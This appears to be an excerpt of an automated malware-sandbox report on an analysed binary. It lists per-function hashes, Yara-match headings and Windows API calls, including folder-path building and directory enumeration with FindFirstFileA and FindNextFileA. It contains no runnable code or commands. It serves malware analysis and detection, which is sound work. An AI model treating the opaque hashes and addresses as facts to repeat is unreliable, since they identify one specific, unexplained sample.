                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 0d210b1b4c9358d75282cdfb18e3a8862855483a3a7b29e54d3370d4c9255257
                              • Instruction ID: f3891d47cae929dfab57f8d02626bfa2f3afcf9dc7eafa889492d5b984ff0066
                              • Opcode Fuzzy Hash: 0d210b1b4c9358d75282cdfb18e3a8862855483a3a7b29e54d3370d4c9255257
                              • Instruction Fuzzy Hash: 1F1127B2904118ABCB14DFC9DD45FBEB7F9FB4CB11F10421AF605A2280E2795940CBB5
                              APIs
                              • __getptd.LIBCMT ref: 004CC74E
                                • Part of subcall function 004CBF9F: __amsg_exit.LIBCMT ref: 004CBFAF
                              • __getptd.LIBCMT ref: 004CC765
                              • __amsg_exit.LIBCMT ref: 004CC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004CC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 265ba36ce5f33fa79e937a878f5fb905af5a5f3b95cd4b0a0595d815829886ae
                              • Instruction ID: 59f0a0298f3fd1f49f00987c91837a0954e236104badc61d75fb21aaee177707
                              • Opcode Fuzzy Hash: 265ba36ce5f33fa79e937a878f5fb905af5a5f3b95cd4b0a0595d815829886ae
                              • Instruction Fuzzy Hash: 0DF0963A9063059BD7A1BB795847F5E33A0DF0071CF21415FF408E62D2CB6C59419E9E
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4F7A
                              • lstrcat.KERNEL32(?,004D1070), ref: 004C4F97
                              • lstrcat.KERNEL32(?,011887F8), ref: 004C4FAB
                              • lstrcat.KERNEL32(?,004D1074), ref: 004C4FBD
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C492C
                                • Part of subcall function 004C4910: FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                                • Part of subcall function 004C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                                • Part of subcall function 004C4910: FindClose.KERNEL32(000000FF), ref: 004C4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: c56c64a5c5d4d393727c562f262a8125da2915752b29172271d3e5f69d15b3db
                              • Instruction ID: 26d5e1ef038fb0116e6fe98caf249280953e9afec83c5283f4c722e4bd46b076
                              • Opcode Fuzzy Hash: c56c64a5c5d4d393727c562f262a8125da2915752b29172271d3e5f69d15b3db
                              • Instruction Fuzzy Hash: 2A21B8BA90020867C754F7B0DC56FF9333DA754304F00454EB65D96191EEB896C8CBA6